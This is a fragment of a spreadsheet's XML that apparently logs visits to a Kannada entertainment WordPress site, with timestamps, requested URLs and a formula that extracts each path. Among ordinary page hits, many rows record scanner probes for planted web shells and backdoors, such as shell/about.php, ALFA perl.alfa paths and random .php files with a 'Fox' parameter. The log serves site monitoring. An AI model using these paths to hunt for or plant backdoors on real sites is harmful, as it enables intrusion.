      <c r="D93" t="str">
        <f t="shared" si="1"/>
        <v/>
      </c>
      <c r="E93" t="s">
        <v>61</v>
      </c>
    </row>
    <row r="94" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A94" s="1">
        <v>45564.152268518519</v>
      </c>
      <c r="B94" t="s">
        <v>111</v>
      </c>
      <c r="C94" t="s">
        <v>112</v>
      </c>
      <c r="D94" t="str">
        <f t="shared" si="1"/>
        <v>actress-anchors-models/embracing-diversity-the-rise-of-plus-size-models-on-instagram/</v>
      </c>
      <c r="E94" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="95" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A95" s="1">
        <v>45563.929861111108</v>
      </c>
      <c r="B95" t="s">
        <v>113</v>
      </c>
      <c r="C95" t="s">
        <v>114</v>
      </c>
      <c r="D95" t="str">
        <f t="shared" si="1"/>
        <v>view.php?name=Samyuktha%20Menon</v>
      </c>
      <c r="E95" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="96" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A96" s="1">
        <v>45563.60732638889</v>
      </c>
      <c r="B96" t="s">
        <v>115</v>
      </c>
      <c r="C96" t="s">
        <v>86</v>
      </c>
      <c r="D96" t="str">
        <f t="shared" si="1"/>
        <v>view_all.php?name=Sureet%20Kular</v>
      </c>
      <c r="E96" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="97" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A97" s="1">
        <v>45563.536168981482</v>
      </c>
      <c r="B97" t="s">
        <v>116</v>
      </c>
      <c r="C97" t="s">
        <v>5</v>
      </c>
      <c r="D97" t="str">
        <f t="shared" si="1"/>
        <v/>
      </c>
      <c r="E97" t="s">
        <v>84</v>
      </c>
    </row>
    <row r="98" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A98" s="1">
        <v>45562.907685185186</v>
      </c>
      <c r="B98" t="s">
        <v>4</v>
      </c>
      <c r="C98" t="s">
        <v>117</v>
      </c>
      <c r="D98" t="str">
        <f t="shared" si="1"/>
        <v>kannada-movies/leonilla-shwetha-dsouza-looks-to-be-a-promising-actress/</v>
      </c>
      <c r="E98" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="99" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A99" s="1">
        <v>45562.436851851853</v>
      </c>
      <c r="B99" t="s">
        <v>118</v>
      </c>
      <c r="C99" t="s">
        <v>119</v>
      </c>
      <c r="D99" t="str">
        <f t="shared" si="1"/>
        <v>wp-content/themes/jaida/lang.php</v>
      </c>
      <c r="E99" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="100" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A100" s="1">
        <v>45562.436759259261</v>
      </c>
      <c r="B100" t="s">
        <v>118</v>
      </c>
      <c r="C100" t="s">
        <v>120</v>
      </c>
      <c r="D100" t="str">
        <f t="shared" si="1"/>
        <v>wp-content/themes/travel/issue.php</v>
      </c>
      <c r="E100" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="101" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A101" s="1">
        <v>45562.436666666668</v>
      </c>
      <c r="B101" t="s">
        <v>118</v>
      </c>
      <c r="C101" t="s">
        <v>121</v>
      </c>
      <c r="D101" t="str">
        <f t="shared" si="1"/>
        <v>wp-content/plugins/wp-help/mini.php</v>
      </c>
      <c r="E101" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="102" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A102" s="1">
        <v>45562.436412037037</v>
      </c>
      <c r="B102" t="s">
        <v>118</v>
      </c>
      <c r="C102" t="s">
        <v>122</v>
      </c>
      <c r="D102" t="str">
        <f t="shared" si="1"/>
        <v>wp-content/plugins/fix/up.php</v>
      </c>
      <c r="E102" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="103" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A103" s="1">
        <v>45562.436296296299</v>
      </c>
      <c r="B103" t="s">
        <v>118</v>
      </c>
      <c r="C103" t="s">
        <v>123</v>
      </c>
      <c r="D103" t="str">
        <f t="shared" si="1"/>
        <v>wp-content/plugins/shell/about.php</v>
      </c>
      <c r="E103" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="104" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A104" s="1">
        <v>45562.231608796297</v>
      </c>
      <c r="B104" t="s">
        <v>124</v>
      </c>
      <c r="C104" t="s">
        <v>125</v>
      </c>
      <c r="D104" t="str">
        <f t="shared" si="1"/>
        <v>kannada-essay/%E0%B2%A7%E0%B2%B0%E0%B3%86%E0%B2%AF-%E0%B2%A8%E0%B2%97%E0%B3%81/</v>
      </c>
      <c r="E104" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="105" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A105" s="1">
        <v>45562.134733796294</v>
      </c>
      <c r="B105" t="s">
        <v>126</v>
      </c>
      <c r="C105" t="s">
        <v>127</v>
      </c>
      <c r="D105" t="str">
        <f t="shared" si="1"/>
        <v>actress-anchors-models/top-telugu-tv-anchors-of-present-time-who-captivate-audiences-with-their-charisma-and-energy/</v>
      </c>
      <c r="E105" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="106" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A106" s="1">
        <v>45561.823923611111</v>
      </c>
      <c r="B106" t="s">
        <v>128</v>
      </c>
      <c r="C106" t="s">
        <v>129</v>
      </c>
      <c r="D106" t="str">
        <f t="shared" si="1"/>
        <v>wp-content/plugins/jupiterx-core/readme.txt</v>
      </c>
      <c r="E106" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="107" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A107" s="1">
        <v>45561.135335648149</v>
      </c>
      <c r="B107" t="s">
        <v>130</v>
      </c>
      <c r="C107" t="s">
        <v>51</v>
      </c>
      <c r="D107" t="str">
        <f t="shared" si="1"/>
        <v>viewup.php?name=Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="E107" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="108" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A108" s="1">
        <v>45561.133738425924</v>
      </c>
      <c r="B108" t="s">
        <v>131</v>
      </c>
      <c r="C108" t="s">
        <v>114</v>
      </c>
      <c r="D108" t="str">
        <f t="shared" si="1"/>
        <v>view.php?name=Samyuktha%20Menon</v>
      </c>
      <c r="E108" t="s">
        <v>132</v>
      </c>
    </row>
    <row r="109" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A109" s="1">
        <v>45561.130532407406</v>
      </c>
      <c r="B109" t="s">
        <v>131</v>
      </c>
      <c r="C109" t="s">
        <v>114</v>
      </c>
      <c r="D109" t="str">
        <f t="shared" si="1"/>
        <v>view.php?name=Samyuktha%20Menon</v>
      </c>
      <c r="E109" t="s">
        <v>132</v>
      </c>
    </row>
    <row r="110" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A110" s="1">
        <v>45561.127442129633</v>
      </c>
      <c r="B110" t="s">
        <v>131</v>
      </c>
      <c r="C110" t="s">
        <v>114</v>
      </c>
      <c r="D110" t="str">
        <f t="shared" si="1"/>
        <v>view.php?name=Samyuktha%20Menon</v>
      </c>
      <c r="E110" t="s">
        <v>132</v>
      </c>
    </row>
    <row r="111" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A111" s="1">
        <v>45560.684976851851</v>
      </c>
      <c r="B111" t="s">
        <v>128</v>
      </c>
      <c r="C111" t="s">
        <v>133</v>
      </c>
      <c r="D111" t="str">
        <f t="shared" si="1"/>
        <v>wp-content/plugins/charitable/readme.txt</v>
      </c>
      <c r="E111" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="112" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A112" s="1">
        <v>45559.851226851853</v>
      </c>
      <c r="B112" t="s">
        <v>134</v>
      </c>
      <c r="C112" t="s">
        <v>135</v>
      </c>
      <c r="D112" t="str">
        <f t="shared" si="1"/>
        <v>?author=3</v>
      </c>
      <c r="E112" t="s">
        <v>136</v>
      </c>
    </row>
    <row r="113" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A113" s="1">
        <v>45559.534409722219</v>
      </c>
      <c r="B113" t="s">
        <v>137</v>
      </c>
      <c r="C113" t="s">
        <v>138</v>
      </c>
      <c r="D113" t="str">
        <f t="shared" si="1"/>
        <v>ayofjrkm.php?Fox=d3wL7</v>
      </c>
      <c r="E113" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="114" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A114" s="1">
        <v>45559.534398148149</v>
      </c>
      <c r="B114" t="s">
        <v>137</v>
      </c>
      <c r="C114" t="s">
        <v>41</v>
      </c>
      <c r="D114" t="str">
        <f t="shared" si="1"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E114" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="115" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A115" s="1">
        <v>45559.534386574072</v>
      </c>
      <c r="B115" t="s">
        <v>137</v>
      </c>
      <c r="C115" t="s">
        <v>43</v>
      </c>
      <c r="D115" t="str">
        <f t="shared" si="1"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E115" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="116" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A116" s="1">
        <v>45559.534375000003</v>
      </c>
      <c r="B116" t="s">
        <v>137</v>
      </c>
      <c r="C116" t="s">
        <v>139</v>
      </c>
      <c r="D116" t="str">
        <f t="shared" si="1"/>
        <v>txdszrvc.php?Fox=d3wL7</v>
      </c>
      <c r="E116" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="117" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A117" s="1">
        <v>45559.534363425926</v>
      </c>
      <c r="B117" t="s">
        <v>137</v>
      </c>
      <c r="C117" t="s">
        <v>45</v>
      </c>
      <c r="D117" t="str">
        <f t="shared" si="1"/>
        <v>alfacgiapi/perl.alfa</v>
      </c>
      <c r="E117" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="118" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A118" s="1">
        <v>45559.534363425926</v>
      </c>
      <c r="B118" t="s">
        <v>137</v>
      </c>
      <c r="C118" t="s">
        <v>41</v>
      </c>
      <c r="D118" t="str">
        <f t="shared" si="1"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E118" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="119" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A119" s="1">
        <v>45559.534351851849</v>
      </c>
      <c r="B119" t="s">
        <v>137</v>
      </c>
      <c r="C119" t="s">
        <v>46</v>
      </c>
      <c r="D119" t="str">
        <f t="shared" si="1"/>
        <v>ALFA_DATA/alfacgiapi/perl.alfa</v>
      </c>
      <c r="E119" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="120" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A120" s="1">
        <v>45559.534351851849</v>
      </c>
      <c r="B120" t="s">
        <v>137</v>
      </c>
      <c r="C120" t="s">
        <v>43</v>
      </c>
      <c r="D120" t="str">
        <f t="shared" si="1"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E120" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="121" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A121" s="1">
        <v>45559.486817129633</v>
      </c>
      <c r="B121" t="s">
        <v>140</v>
      </c>
      <c r="C121" t="s">
        <v>141</v>
      </c>
      <c r="D121" t="str">
        <f t="shared" si="1"/>
        <v>mgpajkel.php?Fox=d3wL7</v>
      </c>
      <c r="E121" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="122" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A122" s="1">
        <v>45559.486805555556</v>
      </c>
      <c r="B122" t="s">
        <v>140</v>
      </c>
      <c r="C122" t="s">
        <v>41</v>
      </c>
      <c r="D122" t="str">
        <f t="shared" si="1"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E122" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="123" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A123" s="1">
        <v>45559.486631944441</v>
      </c>
      <c r="B123" t="s">
        <v>140</v>
      </c>
      <c r="C123" t="s">
        <v>43</v>
      </c>
      <c r="D123" t="str">
        <f t="shared" si="1"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E123" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="124" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A124" s="1">
        <v>45559.486481481479</v>
      </c>
      <c r="B124" t="s">
        <v>140</v>
      </c>
      <c r="C124" t="s">
        <v>41</v>
      </c>
      <c r="D124" t="str">
        <f t="shared" si="1"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E124" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="125" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A125" s="1">
        <v>45559.486481481479</v>
      </c>
      <c r="B125" t="s">
        <v>140</v>
      </c>
      <c r="C125" t="s">
        <v>142</v>
      </c>
      <c r="D125" t="str">
        <f t="shared" si="1"/>
        <v>kkuzggjv.php?Fox=d3wL7</v>
      </c>
      <c r="E125" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="126" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A126" s="1">
        <v>45559.486296296294</v>
      </c>
      <c r="B126" t="s">
        <v>140</v>
      </c>
      <c r="C126" t="s">
        <v>45</v>
      </c>
      <c r="D126" t="str">
        <f t="shared" si="1"/>
        <v>alfacgiapi/perl.alfa</v>
      </c>
      <c r="E126" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="127" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A127" s="1">
        <v>45559.486284722225</v>
      </c>
      <c r="B127" t="s">
        <v>140</v>
      </c>
      <c r="C127" t="s">
        <v>43</v>
      </c>
      <c r="D127" t="str">
        <f t="shared" si="1"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E127" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="128" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A128" s="1">
        <v>45559.486284722225</v>
      </c>
      <c r="B128" t="s">
        <v>140</v>
      </c>
      <c r="C128" t="s">
        <v>46</v>
      </c>
      <c r="D128" t="str">
        <f t="shared" si="1"/>
        <v>ALFA_DATA/alfacgiapi/perl.alfa</v>
      </c>
      <c r="E128" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="129" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A129" s="1">
        <v>45559.392800925925</v>
      </c>
      <c r="B129" t="s">
        <v>143</v>
      </c>
      <c r="C129" t="s">
        <v>51</v>
      </c>
      <c r="D129" t="str">
        <f t="shared" si="1"/>
        <v>viewup.php?name=Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="E129" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="130" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A130" s="1">
        <v>45558.68482638889</v>
      </c>
      <c r="B130" t="s">
        <v>128</v>
      </c>
      <c r="C130" t="s">
        <v>144</v>
      </c>
      <c r="D130" t="str">
        <f t="shared" ref="D130:D193" si="2">MID(C130,FIND("#", SUBSTITUTE(C130, "/", "#", 3))+1,LEN(C130)-FIND("#", SUBSTITUTE(C130, "/", "#", 3))+1)</f>
        <v>wp-content/plugins/learnpress/readme.txt</v>
      </c>
      <c r="E130" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="131" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A131" s="1">
        <v>45558.615081018521</v>
      </c>
      <c r="B131" t="s">
        <v>62</v>
      </c>
      <c r="C131" t="s">
        <v>145</v>
      </c>
      <c r="D131" t="str">
        <f t="shared" si="2"/>
        <v>privacy-policy/</v>
      </c>
      <c r="E131" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="132" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A132" s="1">
        <v>45558.36645833333</v>
      </c>
      <c r="B132" t="s">
        <v>146</v>
      </c>
      <c r="C132" t="s">
        <v>147</v>
      </c>
      <c r="D132" t="str">
        <f t="shared" si="2"/>
        <v>tag/stylewithplixxi/</v>
      </c>
      <c r="E132" t="s">
        <v>105</v>
      </c>
    </row>
    <row r="133" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A133" s="1">
        <v>45558.040486111109</v>
      </c>
      <c r="B133" t="s">
        <v>148</v>
      </c>
      <c r="C133" t="s">
        <v>51</v>
      </c>
      <c r="D133" t="str">
        <f t="shared" si="2"/>
        <v>viewup.php?name=Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="E133" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="134" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A134" s="1">
        <v>45557.162430555552</v>
      </c>
      <c r="B134" t="s">
        <v>149</v>
      </c>
      <c r="C134" t="s">
        <v>5</v>
      </c>
      <c r="D134" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="E134" t="s">
        <v>61</v>
      </c>
    </row>
    <row r="135" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A135" s="1">
        <v>45557.036678240744</v>
      </c>
      <c r="B135" t="s">
        <v>150</v>
      </c>
      <c r="C135" t="s">
        <v>5</v>
      </c>
      <c r="D135" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="E135" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="136" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A136" s="1">
        <v>45557.036377314813</v>
      </c>
      <c r="B136" t="s">
        <v>150</v>
      </c>
      <c r="C136" t="s">
        <v>145</v>
      </c>
      <c r="D136" t="str">
        <f t="shared" si="2"/>
        <v>privacy-policy/</v>
      </c>
      <c r="E136" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="137" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A137" s="1">
        <v>45557.02752314815</v>
      </c>
      <c r="B137" t="s">
        <v>151</v>
      </c>
      <c r="C137" t="s">
        <v>145</v>
      </c>
      <c r="D137" t="str">
        <f t="shared" si="2"/>
        <v>privacy-policy/</v>
      </c>
      <c r="E137" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="138" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A138" s="1">
        <v>45556.065752314818</v>
      </c>
      <c r="B138" t="s">
        <v>150</v>
      </c>
      <c r="C138" t="s">
        <v>5</v>
      </c>
      <c r="D138" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="E138" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="139" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A139" s="1">
        <v>45556.023738425924</v>
      </c>
      <c r="B139" t="s">
        <v>152</v>
      </c>
      <c r="C139" t="s">
        <v>153</v>
      </c>
      <c r="D139" t="str">
        <f t="shared" si="2"/>
        <v>actress-anchors-models/%E0%B2%B0%E0%B2%AE%E0%B3%8D%E0%B2%AF%E0%B2%BE-%E0%B2%AA%E0%B2%B8%E0%B3%81%E0%B2%AA%E0%B3%81%E0%B2%B2%E0%B3%87%E0%B2%9F%E0%B2%BF-%E0%B2%85%E0%B2%B5%E0%B2%B0-%E0%B2%A6%E0%B3%8A%E0%B2%A1%E0%B3%8D/</v>
      </c>
      <c r="E139" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="140" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A140" s="1">
        <v>45555.830601851849</v>
      </c>
      <c r="B140" t="s">
        <v>150</v>
      </c>
      <c r="C140" t="s">
        <v>154</v>
      </c>
      <c r="D140" t="str">
        <f t="shared" si="2"/>
        <v>science/charles-herbert-best/</v>
      </c>
      <c r="E140" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="141" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A141" s="1">
        <v>45555.804212962961</v>
      </c>
      <c r="B141" t="s">
        <v>150</v>
      </c>
      <c r="C141" t="s">
        <v>5</v>
      </c>
      <c r="D141" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="E141" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="142" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A142" s="1">
        <v>45555.722407407404</v>
      </c>
      <c r="B142" t="s">
        <v>155</v>
      </c>
      <c r="C142" t="s">
        <v>119</v>
      </c>
      <c r="D142" t="str">
        <f t="shared" si="2"/>
        <v>wp-content/themes/jaida/lang.php</v>
      </c>
      <c r="E142" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="143" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A143" s="1">
        <v>45555.722314814811</v>
      </c>
      <c r="B143" t="s">
        <v>155</v>
      </c>
      <c r="C143" t="s">
        <v>120</v>
      </c>
      <c r="D143" t="str">
        <f t="shared" si="2"/>
        <v>wp-content/themes/travel/issue.php</v>
      </c>
      <c r="E143" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="144" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A144" s="1">
        <v>45555.722222222219</v>
      </c>
      <c r="B144" t="s">
        <v>155</v>
      </c>
      <c r="C144" t="s">
        <v>121</v>
      </c>
      <c r="D144" t="str">
        <f t="shared" si="2"/>
        <v>wp-content/plugins/wp-help/mini.php</v>
      </c>
      <c r="E144" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="145" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A145" s="1">
        <v>45555.721921296295</v>
      </c>
      <c r="B145" t="s">
        <v>155</v>
      </c>
      <c r="C145" t="s">
        <v>122</v>
      </c>
      <c r="D145" t="str">
        <f t="shared" si="2"/>
        <v>wp-content/plugins/fix/up.php</v>
      </c>
      <c r="E145" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="146" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A146" s="1">
        <v>45555.721782407411</v>
      </c>
      <c r="B146" t="s">
        <v>155</v>
      </c>
      <c r="C146" t="s">
        <v>123</v>
      </c>
      <c r="D146" t="str">
        <f t="shared" si="2"/>
        <v>wp-content/plugins/shell/about.php</v>
      </c>
      <c r="E146" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="147" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A147" s="1">
        <v>45555.383831018517</v>
      </c>
      <c r="B147" t="s">
        <v>156</v>
      </c>
      <c r="C147" t="s">
        <v>5</v>
      </c>
      <c r="D147" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="E147" t="s">
        <v>84</v>
      </c>
    </row>
    <row r="148" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A148" s="1">
        <v>45554.995648148149</v>
      </c>
      <c r="B148" t="s">
        <v>157</v>
      </c>
      <c r="C148" t="s">
        <v>158</v>
      </c>
      <c r="D148" t="str">
        <f t="shared" si="2"/>
        <v>actress-anchors-models/sharwari-gujar-and-archana-gujar-the-dynamic-fitness-enthusiast-mom-and-daughter-duo/</v>
      </c>
      <c r="E148" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="149" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A149" s="1">
        <v>45554.869502314818</v>
      </c>
      <c r="B149" t="s">
        <v>150</v>
      </c>
      <c r="C149" t="s">
        <v>159</v>
      </c>
      <c r="D149" t="str">
        <f t="shared" si="2"/>
        <v>freedom-fighters/freedom-fighter-sanjeevnath-aikala/</v>
      </c>
      <c r="E149" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="150" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A150" s="1">
        <v>45554.765775462962</v>
      </c>
      <c r="B150" t="s">
        <v>150</v>
      </c>
      <c r="C150" t="s">
        <v>160</v>
      </c>
      <c r="D150" t="str">
        <f t="shared" si="2"/>
        <v>tag/lakshmi-rai/</v>
      </c>
      <c r="E150" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="151" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A151" s="1">
        <v>45554.691724537035</v>
      </c>
      <c r="B151" t="s">
        <v>150</v>
      </c>
      <c r="C151" t="s">
        <v>161</v>
      </c>
      <c r="D151" t="str">
        <f t="shared" si="2"/>
        <v>tag/ashlesha-savant/</v>
      </c>
      <c r="E151" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="152" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A152" s="1">
        <v>45554.689305555556</v>
      </c>
      <c r="B152" t="s">
        <v>150</v>
      </c>
      <c r="C152" t="s">
        <v>159</v>
      </c>
      <c r="D152" t="str">
        <f t="shared" si="2"/>
        <v>freedom-fighters/freedom-fighter-sanjeevnath-aikala/</v>
      </c>
      <c r="E152" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="153" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A153" s="1">
        <v>45554.599224537036</v>
      </c>
      <c r="B153" t="s">
        <v>150</v>
      </c>
      <c r="C153" t="s">
        <v>162</v>
      </c>
      <c r="D153" t="str">
        <f t="shared" si="2"/>
        <v>tag/prajakta/</v>
      </c>
      <c r="E153" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="154" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A154" s="1">
        <v>45554.522511574076</v>
      </c>
      <c r="B154" t="s">
        <v>68</v>
      </c>
      <c r="C154" t="s">
        <v>163</v>
      </c>
      <c r="D154" t="str">
        <f t="shared" si="2"/>
        <v>tag/roma-varadkar/</v>
      </c>
      <c r="E154" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="155" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A155" s="1">
        <v>45554.516030092593</v>
      </c>
      <c r="B155" t="s">
        <v>164</v>
      </c>
      <c r="C155" t="s">
        <v>165</v>
      </c>
      <c r="D155" t="str">
        <f t="shared" si="2"/>
        <v>category/kannada-serial-actress/</v>
      </c>
      <c r="E155" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="156" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A156" s="1">
        <v>45554.502685185187</v>
      </c>
      <c r="B156" t="s">
        <v>164</v>
      </c>
      <c r="C156" t="s">
        <v>160</v>
      </c>
      <c r="D156" t="str">
        <f t="shared" si="2"/>
        <v>tag/lakshmi-rai/</v>
      </c>
      <c r="E156" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="157" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A157" s="1">
        <v>45554.391388888886</v>
      </c>
      <c r="B157" t="s">
        <v>166</v>
      </c>
      <c r="C157" t="s">
        <v>161</v>
      </c>
      <c r="D157" t="str">
        <f t="shared" si="2"/>
        <v>tag/ashlesha-savant/</v>
      </c>
      <c r="E157" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="158" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A158" s="1">
        <v>45554.255752314813</v>
      </c>
      <c r="B158" t="s">
        <v>167</v>
      </c>
      <c r="C158" t="s">
        <v>168</v>
      </c>
      <c r="D158" t="str">
        <f t="shared" si="2"/>
        <v>wp-content/plugins/wp-catcher/</v>
      </c>
      <c r="E158" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="159" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A159" s="1">
        <v>45554.174768518518</v>
      </c>
      <c r="B159" t="s">
        <v>169</v>
      </c>
      <c r="C159" t="s">
        <v>168</v>
      </c>
      <c r="D159" t="str">
        <f t="shared" si="2"/>
        <v>wp-content/plugins/wp-catcher/</v>
      </c>
      <c r="E159" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="160" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A160" s="1">
        <v>45553.984386574077</v>
      </c>
      <c r="B160" t="s">
        <v>150</v>
      </c>
      <c r="C160" t="s">
        <v>162</v>
      </c>
      <c r="D160" t="str">
        <f t="shared" si="2"/>
        <v>tag/prajakta/</v>
      </c>
      <c r="E160" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="161" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A161" s="1">
        <v>45553.979305555556</v>
      </c>
      <c r="B161" t="s">
        <v>170</v>
      </c>
      <c r="C161" t="s">
        <v>5</v>
      </c>
      <c r="D161" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="E161" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="162" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A162" s="1">
        <v>45553.956342592595</v>
      </c>
      <c r="B162" t="s">
        <v>167</v>
      </c>
      <c r="C162" t="s">
        <v>171</v>
      </c>
      <c r="D162" t="str">
        <f t="shared" si="2"/>
        <v>wp-content/plugins/wp-catcher/</v>
      </c>
      <c r="E162" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="163" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A163" s="1">
        <v>45553.925879629627</v>
      </c>
      <c r="B163" t="s">
        <v>150</v>
      </c>
      <c r="C163" t="s">
        <v>172</v>
      </c>
      <c r="D163" t="str">
        <f t="shared" si="2"/>
        <v>tag/swetha-changappa/</v>
      </c>
      <c r="E163" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="164" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A164" s="1">
        <v>45553.786805555559</v>
      </c>
      <c r="B164" t="s">
        <v>173</v>
      </c>
      <c r="C164" t="s">
        <v>174</v>
      </c>
      <c r="D164" t="str">
        <f t="shared" si="2"/>
        <v>tag/style-with-plixxi/</v>
      </c>
      <c r="E164" t="s">
        <v>69</v>
      </c>
    </row>
